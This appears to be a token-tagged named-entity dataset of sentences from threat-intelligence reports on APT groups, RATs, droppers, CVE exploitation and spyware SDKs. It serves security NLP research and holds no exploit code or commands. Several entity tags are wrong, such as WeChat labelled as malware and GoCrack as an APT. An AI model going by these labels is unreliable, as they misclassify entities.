+observing O +multiple O +commodity O +campaigns O +Mostly O +dropping O +AsyncRAT S-FILE +using O +the O +updated O +RTF O +weaponizer O +with O +the O +same O +exploit S-VULNAME +( O +CVE-2018-0798 S-VULID +) O +. 
O + +In O +addition O +, O +a O +current O +ANY.RUN S-FILE +playback O +of O +our O +observed O +Elise S-FILE +infection O +is O +also O +available O +. O + +Upon O +opening O +of O +the O +MS O +Word S-TOOL +document O +, O +our O +embedded O +file O +exploits O +CVE-2017-11882 S-VULID +to O +drop O +a O +malicious O +fake O +Norton O +Security O +Shell O +Extension O +module O +, O +'NavShExt.dll' S-FILE +, O +which O +is O +then O +injected O +into O +iexplore.exe S-FILE +to O +install O +the O +backdoor O +, O +begin O +collection O +, O +and O +activate O +command O +and O +control O +. O + +Moving O +through O +the O +infection O +process O +, O +NetWitness O +Endpoint O +detects O +the O +initial O +exploit S-VULNAME +CVE-2017-1182 S-VULID +in O +action O +as O +the O +Microsoft B-FILE +Equation I-FILE +Editor E-FILE +, O +'EQNEDT32.exe' S-FILE +, O +scores O +high O +for O +potentially O +malicious O +activity O +. O + +The O +well-crafted O +and O +socially O +engineered O +malicious O +documents O +then O +become O +the O +first O +stage O +of O +a O +long O +and O +mainly O +fileless O +infection O +chain O +that O +eventually O +delivers O +POWERSTATS S-FILE +, O +a O +signature O +PowerShell B-FILE +backdoor E-FILE +of O +this O +threat O +group O +. O + +This O +powerful O +backdoor S-FILE +can O +receive O +commands O +from O +the O +attackers O +, O +enabling O +it O +to O +exfiltrate O +files O +from O +the O +system O +it O +is O +running O +on O +, O +execute O +additional O +scripts O +, O +delete O +files O +, O +and O +more O +. O + +If O +the O +macros O +in O +SPK B-FILE +KANUN E-FILE +DEĞİŞİKLİĞİ O +GİB O +GÖRÜŞÜ.doc” O +are O +enabled O +, O +an O +embedded O +payload O +is O +decoded O +and O +saved O +in O +the O +%APPDATA% O +directory O +with O +the O +name O +CiscoAny.exe” S-FILE +. 
O + +INF B-MAL +files E-MAL +have O +been O +used O +in O +the O +past O +by O +MuddyWater S-APT +, O +although O +they O +were O +launched O +using O +Advpack.dll S-MAL +and O +not O +IEAdvpack.dll S-MAL +. O + +In O +addition O +, O +by O +using O +VBA2Graph S-FILE +, O +we O +were O +able O +to O +visualize O +the O +VBA O +call O +graph O +in O +the O +macros O +of O +each O +document O +. O + +We O +assume O +that O +RunPow O +stands O +for O +run O +PowerShell S-TOOL +, O +” O +and O +triggers O +the O +PowerShell S-TOOL +code O +embedded O +inside O +the O +.dll B-FILE +file E-FILE +. O + +The O +main O +delivery O +method O +of O +this O +type O +of O +backdoor S-FILE +is O +spear S-ACT +phishing S-ACT +emails S-TOOL +or O +spam S-ACT +that O +uses O +social O +engineering O +to O +manipulate O +targets O +into O +enabling O +malicious O +documents O +. O + +This O +includes O +Python S-TOOL +scripts O +. O +Usually O +, O +the O +Stageless B-FILE +Meterpreter E-FILE +has O +the O +Ext_server_stdapi.x64.dll” S-FILE +, O +Ext_server_extapi.x64.dll” S-FILE +, O +and O +Ext_server_espia.x64.dll” S-FILE +extensions O +. O + +However O +, O +Kaspersky S-SECTEAM +Security O +Network O +(KSN) O +records O +also O +contain O +links O +that O +victims O +clicked O +from O +the O +Outlook S-TOOL +web O +client O +outlook.live.com” S-FILE +as O +well O +as O +attachments O +arriving O +through O +the O +Outlook S-TOOL +desktop O +application O +. O + +The O +JavaScript S-FILE +forces O +visiting O +web O +browsers O +to O +collect O +and O +send O +(via O +a O +POST O +request) O +web O +browser O +, O +browser O +version O +, O +country O +of O +origin O +, O +and O +IP S-PROT +address O +data O +to O +the O +attacker O +controlled O +server O +jquerycodedownload.live/check.aspx” O +. O + +we O +identified O +two O +methods O +to O +deliver O +the O +KerrDown S-FILE +downloader O +to O +targets O +. 
O + +The O +link O +to O +the O +final O +payload O +of O +KerrDown S-FILE +was O +still O +active O +during O +the O +time O +of O +analysis O +and O +hence O +we O +were O +able O +to O +download O +a O +copy O +which O +turned O +out O +to O +be O +a O +variant O +of O +Cobalt O +Strike O +Beacon O +. O + +While O +investigating O +KerrDown S-FILE +we O +found O +multiple O +RAR O +files O +containing O +a O +variant O +of O +the O +malware O +. O + +The O +dropped O +PE S-MAL +file O +has O +the O +distinctive O +file O +name O +8.t” S-FILE +. O + +The O +malware S-FILE +was O +first O +seen O +packed O +with O +VMProtect; O +when O +unpacked O +the O +sample O +didn’t O +show O +any O +similarities O +with O +previously O +known O +malware O +. O + +The O +malware S-FILE +starts O +communicating O +with O +the O +C&C S-TOOL +server O +by O +sending O +basic O +information O +about O +the O +infected O +machine O +. O + +The O +malware S-FILE +basically O +provides O +a O +remote O +CMD/PowerShell S-MAL +terminal O +for O +the O +attackers S-APT +, O +enabling O +them O +to O +execute O +scripts/commands O +and O +receive O +the O +results O +via O +HTTP S-PROT +requests O +. O + +This O +time O +the O +document O +purported O +to O +be O +about O +the O +involvement O +of O +the O +Emir S-LOC +of O +Qatar S-LOC +in O +funding O +ISIS S-LOC +, O +which O +was O +seemingly O +copied O +from O +a O +website O +critical O +of O +Qatar O +. O + +The O +SDK S-MAL +, O +named O +SWAnalytics S-FILE +is O +integrated O +into O +seemingly O +innocent O +Android S-OS +applications O +published B-ACT +on E-ACT +major O +3rd O +party O +Chinese O +app O +stores O +such O +as O +Tencent B-IDTY +MyApp E-IDTY +, O +Wandoujia S-IDTY +, O +Huawei B-IDTY +App I-IDTY +Store E-IDTY +, O +and O +Xiaomi B-IDTY +App I-IDTY +Store E-IDTY +. 
O + +After O +app O +installation O +, O +whenever O +SWAnalytics S-FILE +senses O +victims O +opening O +up O +infected O +applications O +or O +rebooting O +their O +phones O +, O +it O +silently O +uploads O +their O +entire O +contacts O +list O +to O +Hangzhou O +Shun O +Wang O +Technologies O +controlled O +servers O +. O + +This O +module S-FILE +monitors O +a O +wide O +range O +of O +device O +activities O +including O +application O +installation O +/ O +remove O +/ O +update O +, O +phone O +restart O +and O +battery O +charge O +. O + +It O +turns O +out O +that O +contacts O +data O +isn’t O +the O +only O +unusual O +data O +SWAnalytics S-FILE +is O +interested O +in O +. O + +With O +default O +settings O +, O +SWAnalytics S-FILE +will O +scan O +through O +an O +Android S-OS +device’s O +external O +storage O +, O +looking O +for O +directory O +tencent/MobileQQ/WebViewCheck” O +. O + +From O +our O +first O +malicious B-FILE +sample E-FILE +encounter O +back O +in O +mid-September S-TIME +until O +now O +, O +we O +have O +observed O +12 O +infected O +applications O +, O +the O +majority O +of O +which O +are O +in O +the O +system O +utility O +category O +. O + +By O +listing O +sub-folders O +, O +SWAnalytics S-FILE +is O +able O +to O +infer O +QQ O +accounts O +which O +have O +never O +been O +used O +on O +the O +device O +. O + +To O +make O +this O +data O +harvesting O +operation O +flexible O +, O +SWAnalytics S-FILE +equips O +the O +ability O +to O +receive O +and O +process O +configuration O +files O +from O +a O +remote O +Command-and-Control O +. O + +Whenever O +users O +reboot O +their O +device O +or O +open O +up O +Network B-ACT +Speed I-ACT +Master E-ACT +, O +SWAnalytics S-FILE +will O +fetch O +the O +latest O +configuration O +file O +from O +http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” O +. 
O + +In O +order O +to O +understand O +SWAnalytics’ S-FILE +impact O +, O +we O +turned O +to O +public O +download O +volume O +data O +available O +on O +Chandashi O +, O +one O +of O +the O +app O +store O +optimization O +vendors O +specialized O +in O +Chinese S-LOC +mobile O +application O +markets O +. O + +According O +to O +Cheetah O +Mobile’s O +follow-up O +investigation O +, O +fraudulent O +behaviors O +came O +from O +two O +3rd O +party O +SDKs O +Batmobi S-FILE +, O +Duapps S-FILE +integrated O +inside O +Cheetah B-FILE +SDK E-FILE +. O + +It O +is O +likely O +a O +new O +campaign O +or O +actor S-APT +started O +using O +Panda B-MAL +Banker E-MAL +since O +in O +addition O +to O +the O +previously O +unseen O +Japanese S-LOC +targeting O +, O +Arbor S-SECTEAM +has O +not O +seen O +any O +indicator O +of O +compromise O +(IOC) O +overlaps O +with O +previous O +Panda B-FILE +Banker E-FILE +campaigns O +. O + +Webinjects O +targeting O +Japan S-LOC +, O +a O +country O +we O +haven’t O +seen O +targeted O +by O +Panda B-FILE +Banker E-FILE +before O +. O + +Japan S-LOC +is O +no O +stranger O +to O +banking S-FILE +malware S-FILE +. O + +Based O +on O +recent O +reports O +, O +the O +country S-LOC +has O +been O +plagued O +by O +attacks O +using O +the O +Ursnif S-FILE +and O +Urlzone S-FILE +banking O +malware O +. O + +This O +post O +was O +our O +first O +analysis O +of O +the O +first O +Panda B-FILE +Banker E-FILE +campaign O +that O +we’ve O +seen O +to O +target O +financial B-IDTY +institutions E-IDTY +in O +Japan S-LOC +. O + +we O +believe O +the O +iOS O +malware O +gets O +installed O +on O +already O +compromised O +systems O +, O +and O +it O +is O +very O +similar O +to O +next O +stage O +SEDNIT S-FILE +malware O +we O +have O +found O +for O +Microsoft S-IDTY +Windows’ O +systems O +. 
O + +One O +is O +called O +XAgent S-FILE +detected O +as O +IOS_XAGENT.A S-FILE +and O +the O +other O +one O +uses O +the O +name O +of O +a O +legitimate O +iOS O +game O +, O +MadCap S-FILE +detected O +as O +IOS_ O +XAGENT.B S-FILE +. O + +Madcap” S-FILE +is O +similar O +to O +the O +XAgent S-FILE +malware O +, O +but O +the O +former O +is O +focused O +on O +recording O +audio O +. O + +This O +full-blown O +spying O +framework O +consists O +of O +two O +packages O +named O +‘Tokyo’ S-FILE +and O +‘Yokohama’ S-FILE +. O + +Just O +to O +highlight O +its O +capabilities O +, O +TajMahal S-FILE +is O +able O +to O +steal O +data O +from O +a O +CD O +burnt O +by O +a O +victim O +as O +well O +as O +from O +the O +printer O +queue O +. O + +The O +first O +confirmed O +date O +when O +TajMahal S-FILE +samples O +were O +seen O +on O +a O +victim’s O +machine O +is O +August S-TIME +2014 S-TIME +. O + +More O +details O +about O +TajMahal S-FILE +are O +available O +to O +customers O +of O +the O +Kaspersky S-SECTEAM +Intelligence O +Reporting O +service O +. O + +The O +delivery O +of O +KopiLuwak O +in O +this O +instance O +is O +currently O +unknown O +as O +the O +MSIL B-FILE +dropper E-FILE +has O +only O +been O +observed O +by O +Proofpoint S-SECTEAM +researchers O +on O +a O +public O +malware O +repository O +. O + +The O +earliest O +step O +in O +any O +possible O +attack(s) O +involving O +this O +variant O +of O +KopiLuwak S-FILE +of O +which O +Proofpoint O +researchers O +are O +currently O +aware O +begin O +with O +the O +MSIL B-FILE +dropper E-FILE +. O + +The O +basic O +chain O +of O +events O +upon O +execution O +of O +the O +MSIL B-FILE +dropper E-FILE +include O +dropping O +and O +executing O +both O +a O +PDF S-TOOL +decoy O +and O +a O +Javascript B-FILE +(JS) I-FILE +dropper E-FILE +. 
O + +As O +explained O +in O +further O +detail O +below O +, O +the O +JS B-FILE +dropper E-FILE +ultimately O +installs O +a O +JS B-FILE +decryptor E-FILE +onto O +an O +infected O +machine O +that O +will O +then O +finally O +decrypt O +and O +execute O +the O +actual O +KopiLuwak S-FILE +backdoor O +in O +memory O +only O +. O + +As O +Proofpoint S-SECTEAM +has O +not O +yet O +observed O +this O +attack O +in O +the O +wild O +it O +is O +likely O +that O +there O +is O +an O +additional O +component O +that O +leads O +to O +the O +execution O +of O +the O +MSIL B-FILE +payload E-FILE +. O + +The O +newer O +variant O +of O +KopiLuwak S-FILE +is O +now O +capable O +of O +exfiltrating O +files O +to O +the O +C&C S-TOOL +as O +well O +as O +downloading O +files O +and O +saving O +them O +to O +the O +infected O +machine O +. O + +We O +didn’t O +choose O +to O +name O +it O +after O +a O +vegetable; O +the O +.NET B-FILE +malware E-FILE +developers O +named O +it O +Topinambour S-FILE +themselves O +. O + +The O +role O +of O +the O +.NET B-FILE +module E-FILE +is O +to O +deliver O +the O +known O +KopiLuwak B-FILE +JavaScript E-FILE +Trojan S-MAL +. O + +RocketMan!” S-FILE +(probably O +a O +reference O +to O +Donald O +Trump’s O +nickname O +for O +Kim O +Jong O +Un) O +and O +MiamiBeach” S-FILE +serve O +as O +the O +first O +beacon O +messages O +from O +the O +victim O +to O +the O +control O +server O +. O + +These O +could O +be O +tools O +to O +circumvent O +internet O +censorship O +, O +such O +as O +Softether B-FILE +VPN I-FILE +4.12” E-FILE +and O +psiphon3” S-FILE +, O +or O +Microsoft B-FILE +Office I-FILE +activators” E-FILE +. O + +These O +campaign-related O +VPSs S-APT +are O +located O +in O +South S-LOC +Africa S-LOC +. O +The O +tool O +does O +all O +that O +a O +typical O +Trojan S-FILE +needs O +to O +accomplish: O +upload O +, O +download O +and O +execute O +files O +, O +fingerprint O +target O +systems O +. 
O + +The O +PowerShell S-TOOL +version O +of O +the O +Trojan S-MAL +also O +has O +the O +ability O +to O +get O +screenshots O +. O + +The O +Trojan S-FILE +is O +quite O +similar O +to O +the O +.NET B-FILE +RocketMan I-FILE +Trojan E-FILE +and O +can O +handle O +the O +same O +commands; O +additionally O +, O +it O +includes O +the O +#screen” O +command O +to O +take O +a O +screenshot O +. O + +Initial O +reports O +about O +HIGHNOON S-FILE +and O +its O +variants O +reported O +publicly O +as O +Winnti S-APT +dating O +back O +to O +at O +least O +2013 S-TIME +indicated O +the O +tool O +was O +exclusive O +to O +a O +single O +group O +, O +contributing O +to O +significant O +conflation O +across O +multiple O +distinct O +espionage O +operations O +. O + +BalkanRAT S-FILE +enables O +the O +attacker O +to O +remotely O +control O +the O +compromised O +computer O +via O +a O +graphical O +interface O +, O +i.e. O +, O +manually; O +BalkanDoor S-FILE +enables O +them O +to O +remotely O +control O +the O +compromised O +computer O +via O +a O +command O +line O +, O +i.e. O +, O +possibly O +en O +masse O +. O + +Both O +BalkanRAT S-FILE +and O +BalkanDoor S-FILE +spread O +in O +Croatia S-LOC +, O +Serbia S-LOC +, O +Montenegro S-LOC +, O +and O +Bosnia S-LOC +and O +Herzegovina S-LOC +. O + +In O +some O +of O +the O +latest O +samples O +of O +BalkanDoor S-FILE +detected O +in O +2019 S-TIME +, O +the O +malware O +is O +distributed O +as O +an O +ACE O +archive O +, O +disguised O +as O +a O +RAR O +archive O +(i.e. O +, O +not O +an O +executable O +file) O +, O +specially O +crafted O +to O +exploit S-VULNAME +the O +WinRAR S-TOOL +ACE O +vulnerability O +CVE-2018-20250 S-VULID +. O + +The O +backdoor S-FILE +can O +connect O +to O +any O +of O +the O +C&Cs O +from O +a O +hardcoded O +list O +– O +a O +measure O +to O +increase O +resilience O +. 
O + +The O +main O +part O +of O +the O +BalkanRAT B-FILE +malware E-FILE +is O +a O +copy O +of O +the O +Remote O +Utilities O +software O +for O +remote B-ACT +access E-ACT +. O + +China B-FILE +Chopper E-FILE +is O +a O +tool O +that O +allows O +attackers S-APT +to O +remotely O +control O +the O +target O +system O +that O +needs O +to O +be O +running O +a O +web O +server O +application O +before O +it O +can O +be O +targeted O +by O +the O +tool O +. O + +China B-FILE +Chopper E-FILE +contains O +a O +remote O +shell O +( O +Virtual B-TOOL +Terminal E-TOOL +) O +function O +that O +has O +a O +first O +suggested O +command O +of O +netstat O +an|find O +ESTABLISHED O +. O + +They O +download O +and O +install O +an O +archive O +containing O +executables O +and O +trivially O +modified O +source O +code O +of O +the O +password-stealing O +tool O +Mimikatz B-FILE +Lite E-FILE +as O +GetPassword.exe S-FILE +. O + +The O +tool S-FILE +investigates O +the O +Local O +Security O +Authority O +Subsystem O +memory O +space O +in O +order O +to O +find O +, O +decrypt O +and O +display O +retrieved O +passwords O +. O + +The O +China B-FILE +Chopper E-FILE +actor O +activity O +starts O +with O +the O +download O +and O +execution O +of O +two O +exploit S-VULNAME +files O +which O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +vulnerabilities O +CVE-2015-0062 S-VULID +, O +CVE-2015-1701 S-VULID +and O +CVE-2016-0099 S-VULID +to O +allow O +the O +attacker S-APT +to O +modify O +other O +objects O +on O +the O +server O +. O + +The O +following O +archive S-FILE +caught O +our O +attention O +for O +exploiting O +a O +WinRAR S-TOOL +unacev2 O +module O +vulnerability S-VULNAME +and O +for O +having O +interesting O +content O +. 
O + +Let’s O +take O +a O +closer O +look O +at O +ITG08’s S-APT +TTPs O +that O +are O +relevant O +to O +the O +campaign O +we O +investigated O +, O +starting O +with O +its O +spear B-ACT +phishing E-ACT +and O +intrusion B-ACT +tactics E-ACT +and O +covering B-ACT +information E-ACT +on O +its O +use O +of O +the O +More_eggs B-FILE +backdoor E-FILE +. O + +Additional O +capabilities O +of O +the O +More_eggs B-FILE +malware E-FILE +include O +the O +download O +and O +execution O +of O +files O +and O +scripts O +and O +running O +commands O +using O +cmd.exe S-FILE +. O + +Based O +on O +this O +, O +we O +believe O +the O +Rancor S-APT +attackers S-APT +were O +targeting O +political B-IDTY +entities E-IDTY +. O + +Other O +groups S-APT +, O +such O +as O +Buhtrap S-APT +, O +Corkow S-MAL +and O +Carbanak S-APT +, O +were O +already O +known O +to O +target O +and O +successfully O +steal O +money O +from O +financial B-IDTY +institutions E-IDTY +and O +their O +customers S-IDTY +in O +Russia S-LOC +. O + +Since O +last O +week O +, O +iSIGHT B-SECTEAM +Partners E-SECTEAM +has O +worked O +to O +provide O +details O +on O +the O +power O +outage O +in O +Ukraine S-LOC +to O +our O +global O +customers S-IDTY +. O + +The O +attacks O +we O +attribute O +to O +Scarlet B-APT +Mimic E-APT +have O +primarily O +targeted O +Uyghur S-IDTY +and O +Tibetan B-IDTY +activists E-IDTY +as O +well O +as O +those O +who O +are O +interested O +in O +their O +causes O +. O + +The O +most O +recent O +Scarlet B-ACT +Mimic I-ACT +attacks E-ACT +we O +have O +identified O +were O +conducted O +in O +2015 S-TIME +and O +suggest O +the O +group O +has O +a O +significant O +interest O +in O +both O +Muslim B-IDTY +activists E-IDTY +and O +those O +interested O +in O +critiques O +of O +the O +Russian B-IDTY +government E-IDTY +and O +Russian S-LOC +President O +Vladimir O +Putin O +. 
O + +Based O +on O +analysis O +of O +the O +data O +and O +malware O +samples O +we O +have O +collected O +, O +Unit B-SECTEAM +42 E-SECTEAM +believes O +the O +attacks O +described O +herein O +are O +the O +work O +of O +a O +group O +or O +set O +of O +cooperating O +groups S-APT +who O +have O +a O +single O +mission O +, O +collecting O +information O +on O +minority B-IDTY +groups E-IDTY +who O +reside O +in O +and O +around O +northwestern B-LOC +China E-LOC +. O + +In O +the O +past O +, O +Scarlet B-APT +Mimic E-APT +has O +primarily O +targeted O +individuals O +who O +belong O +to O +these O +minority B-IDTY +groups E-IDTY +as O +well O +as O +their O +supporters S-IDTY +, O +but O +we've O +recently O +found O +evidence O +to O +indicate O +the O +group O +also O +targets O +individuals O +working O +inside O +government O +anti-terrorist B-IDTY +organizations E-IDTY +. O + +Our O +investigation O +showed O +that O +these O +attacks O +were O +targeted O +, O +and O +that O +the O +threat O +actor O +sought O +to O +steal O +communications O +data O +of O +specific B-IDTY +individuals E-IDTY +in O +various O +countries O +. O + +CapabilitiesFormBook S-IDTY +is O +a O +data O +stealer O +, O +but O +not O +a O +full-fledged O +banker S-IDTY +. O + +While O +discussions O +of O +threats O +in O +this O +region O +often O +focus O +on O +" O +North O +America O +" O +generally O +or O +just O +the O +United O +States O +, O +nearly O +100 O +campaigns S-ACT +during O +this O +period O +were O +either O +specifically O +targeted O +at O +Canadian O +organizations O +or O +were O +customized O +for O +Canadian S-LOC +audiences S-IDTY +. 
O + +In O +all O +emails S-TOOL +sent O +to O +these O +government B-IDTY +officials E-IDTY +, O +the O +actor O +used O +the O +same O +attachment O +: O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +document E-FILE +that O +exploited O +the O +CVE-2012-0158 S-VULID +vulnerability O +to O +drop O +a O +malicious O +payload O +. O + +In O +this O +latest O +incident O +, O +the O +group O +registered O +a O +fake O +news O +domain O +, O +timesofindiaa.in O +, O +on O +May B-TIME +18 E-TIME +, O +2016 S-TIME +, O +and O +then O +used O +it O +to O +send O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +Indian S-LOC +government B-IDTY +officials E-IDTY +on O +the O +same O +day O +. O + +The O +first O +time O +this O +happened O +was O +at O +the O +beginning O +of O +the O +month O +, O +when O +Proofpoint S-SECTEAM +researchers O +blew O +the O +lid O +off O +a O +cyber-espionage B-ACT +campaign E-ACT +named O +Operation B-ACT +Transparent I-ACT +Tribe E-ACT +, O +which O +targeted O +the O +Indian O +embassies S-IDTY +in O +Saudi B-LOC +Arabia E-LOC +and O +Kazakhstan S-LOC +. O + +Back O +in O +February B-TIME +2016 E-TIME +, O +Indian O +army B-IDTY +officials E-IDTY +issued O +a O +warning O +against O +the O +usage O +of O +three O +apps O +, O +WeChat S-MAL +, O +SmeshApp S-MAL +, O +and O +Line S-MAL +, O +fearing O +that O +these O +apps O +collected O +too O +much O +information O +if O +installed O +on O +smartphones O +used O +by O +Indian O +army B-IDTY +personnel E-IDTY +. O + +According O +to O +the O +security B-IDTY +firm E-IDTY +, O +this O +campaign O +targeted O +Indian O +military B-IDTY +officials E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +, O +distributing O +spyware O +to O +its O +victims O +via O +an O +Adobe B-TOOL +Reader E-TOOL +vulnerability S-VULNAME +. 
O + +In O +addition O +to O +these O +, O +the O +Animal O +Farm O +attackers O +used O +at O +least O +one O +unknown O +, O +mysterious O +malware O +during O +an O +operation O +targeting O +computer O +users S-IDTY +in O +Burkina O +Faso O +. O + +PLATINUM S-APT +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +The O +group O +'s O +persistent O +use O +of O +spear B-ACT +phishing I-ACT +tactics E-ACT +( O +phishing S-ACT +attempts O +aimed O +at O +specific B-IDTY +individuals E-IDTY +) O +and O +access O +to O +previously O +undiscovered O +zero-day S-VULNAME +exploits O +have O +made O +it O +a O +highly O +resilient O +threat O +. O + +Researching O +this O +attack O +and O +the O +malware O +used O +therein O +led O +Microsoft S-IDTY +to O +discover O +other O +instances O +of O +PLATINUM S-APT +attacking O +users S-IDTY +in O +India S-LOC +around O +August B-TIME +2015 E-TIME +. O + +The O +Poseidon B-APT +Group E-APT +actively O +targets O +this O +sort O +of O +corporate O +environment O +for O +the O +theft O +of O +intellectual O +property O +and O +commercial O +information O +, O +occasionally O +focusing O +on O +personal O +information O +on O +executives S-IDTY +. 
O + +The O +previous O +two O +volumes O +of O +the O +Microsoft S-IDTY +Security O +Intelligence O +Report O +explored O +the O +activities S-ACT +of O +two O +such O +groups S-APT +, O +code-named O +STRONTIUM S-APT +and O +PLATINUM S-APT +, O +which O +used O +previously O +unknown O +vulnerabilities O +and O +aggressive O +, O +persistent O +techniques O +to O +target O +specific B-IDTY +individuals E-IDTY +and O +institutions S-IDTY +— O +often O +including O +military S-IDTY +installations O +, O +intelligence B-IDTY +agencies E-IDTY +, O +and O +other O +government S-IDTY +bodies O +. O + +Mark B-IDTY +Zuckerberg E-IDTY +, O +Jack B-IDTY +Dorsey E-IDTY +, O +Sundar B-IDTY +Pichai E-IDTY +, O +and O +Daniel B-IDTY +Ek E-IDTY +— O +the O +CEOs S-IDTY +of O +Facebook S-IDTY +, O +Twitter S-IDTY +, O +Google S-IDTY +and O +Spotify O +, O +respectively O +— O +have O +also O +fallen O +victim O +to O +the O +hackers O +, O +dispelling O +the O +notion O +that O +a O +career O +in O +software O +and O +technology S-IDTY +exempts O +one O +from O +being O +compromised O +. O + +The O +group O +is O +well O +known O +: O +They O +hijacked O +WikiLeaks' S-SECTEAM +DNS S-PROT +last O +month O +shortly O +after O +they O +took O +over O +HBO O +'s O +Twitter S-IDTY +account O +; O +last O +year O +, O +they O +took O +over O +Mark B-IDTY +Zuckerberg E-IDTY +'s O +Twitter S-IDTY +and O +Pinterest S-IDTY +accounts O +; O +and O +they O +hit O +both O +BuzzFeed S-IDTY +and O +TechCrunch S-IDTY +not O +long O +after O +that O +. 
O + +OurMine S-APT +is O +well O +known O +: O +They O +hijacked O +WikiLeaks' S-SECTEAM +DNS S-PROT +last O +month O +shortly O +after O +they O +took O +over O +HBO O +'s O +Twitter S-IDTY +account O +; O +last O +year O +, O +they O +took O +over O +Mark B-IDTY +Zuckerberg E-IDTY +'s O +Twitter S-IDTY +and O +Pinterest S-IDTY +accounts O +; O +and O +they O +hit O +both O +BuzzFeed S-IDTY +and O +TechCrunch S-IDTY +not O +long O +after O +that O +. O + +Probably O +the O +most O +high-profile O +attack O +that O +GandCrab S-MAL +was O +behind O +is O +a O +series O +of O +infections O +at O +customers S-IDTY +of O +remote O +IT B-IDTY +support I-IDTY +firms E-IDTY +in O +the O +month O +of O +February O +. O + +Further O +tracking O +of O +the O +Lazarus’s S-APT +activities O +has O +enabled O +Kaspersky S-SECTEAM +researchers O +to O +discover O +a O +new O +operation O +, O +active O +since O +at O +least O +November B-TIME +2018 E-TIME +, O +which O +utilizes O +PowerShell S-MAL +to O +control O +Windows S-OS +systems O +and O +Mac O +OS O +malware O +to O +target O +Apple B-IDTY +customers E-IDTY +. O + +Users S-IDTY +who O +failed O +to O +patch O +their O +systems O +may O +find O +themselves O +mining O +cryptocurrency O +for O +threat O +actors S-APT +. O + +Keeping O +in O +mind O +the O +sensitivity O +of O +passwords O +, O +GoCrack S-APT +includes O +an O +entitlement-based O +system O +that O +prevents O +users O +from O +accessing O +task O +data O +unless O +they O +are O +the O +original O +creator O +or O +they O +grant O +additional B-IDTY +users E-IDTY +to O +the O +task O +. O + +The O +threat O +actor’s S-APT +emails S-TOOL +usually O +contain O +a O +picture O +or O +a O +link O +without O +a O +malicious B-FILE +payload E-FILE +and O +are O +sent O +out O +to O +a O +huge O +recipient O +database O +of O +up O +to O +85 O +, O +000 O +users S-IDTY +. 
O + +The O +admin@338 S-APT +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. O + +This O +week O +the O +experts O +at O +FireEye S-SECTEAM +discovered O +that O +a O +group O +of O +Chinese-based S-LOC +hackers O +called O +admin@338 S-APT +had O +sent O +multiple O +MH370-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +, O +the O +attackers S-APT +targeted O +government B-IDTY +officials E-IDTY +in O +Asia-Pacific S-LOC +, O +it O +is O +likely O +for O +cyber B-APT +espionage E-APT +purpose O +. O + +The O +attackers S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +The O +admin@338 S-APT +used O +the O +popular O +Poison B-MAL +Ivy I-MAL +RAT E-MAL +and O +WinHTTPHelper S-MAL +malware S-MAL +to O +compromise O +the O +computers O +of O +government B-IDTY +officials E-IDTY +. O + +The O +group O +previous O +activities S-ACT +against O +financial S-IDTY +and O +policy B-IDTY +organizations E-IDTY +have O +largely O +focused O +on O +spear B-ACT +phishing E-ACT +emails S-TOOL +written O +in O +English O +, O +destined O +for O +Western S-LOC +audiences S-IDTY +. O + +The O +targets O +were O +similar O +to O +a O +2015 S-TIME +TG-4127 B-ACT +campaign E-ACT +— O +individuals O +in O +Russia S-LOC +and O +the O +former B-LOC +Soviet E-LOC +states O +, O +current O +and O +former O +military S-IDTY +and O +government B-IDTY +personnel E-IDTY +in O +the O +U.S. 
S-LOC +and O +Europe S-LOC +, O +individuals O +working O +in O +the O +defense S-IDTY +and O +government S-IDTY +supply O +chain O +, O +and O +authors S-IDTY +and O +journalists S-IDTY +— O +but O +also O +included O +email S-ACT +accounts O +linked O +to O +the O +November B-TIME +2016 E-TIME +United B-LOC +States E-LOC +presidential O +election O +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +, O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. O + +APT28 B-ACT +espionage I-ACT +activity E-ACT +has O +primarily O +targeted O +entities O +in O +the O +U.S. S-LOC +, O +Europe S-LOC +, O +and O +the O +countries O +of O +the O +former B-LOC +Soviet I-LOC +Union E-LOC +, O +including O +governments S-IDTY +and O +militaries S-IDTY +, O +defense B-IDTY +attaches E-IDTY +, O +media B-IDTY +entities E-IDTY +, O +and O +dissidents S-IDTY +and O +figures S-IDTY +opposed O +to O +the O +current O +Russian B-IDTY +government E-IDTY +. O + +APT28 S-APT +targets O +Russian S-LOC +rockers S-IDTY +and O +dissidents B-IDTY +Pussy I-IDTY +Riot E-IDTY +via O +spear-phishing S-ACT +emails S-TOOL +. O + +We O +have O +reasons O +to O +believe O +that O +the O +operators S-APT +of O +the O +APT28 S-APT +network O +are O +either O +Russian S-LOC +citizens S-IDTY +or O +citizens S-IDTY +of O +a O +neighboring O +country O +that O +speak O +Russian S-LOC +. 
